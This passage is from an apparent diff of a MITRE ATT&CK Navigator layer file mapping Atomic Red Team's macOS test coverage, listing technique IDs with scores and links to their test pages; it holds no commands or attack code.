{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabl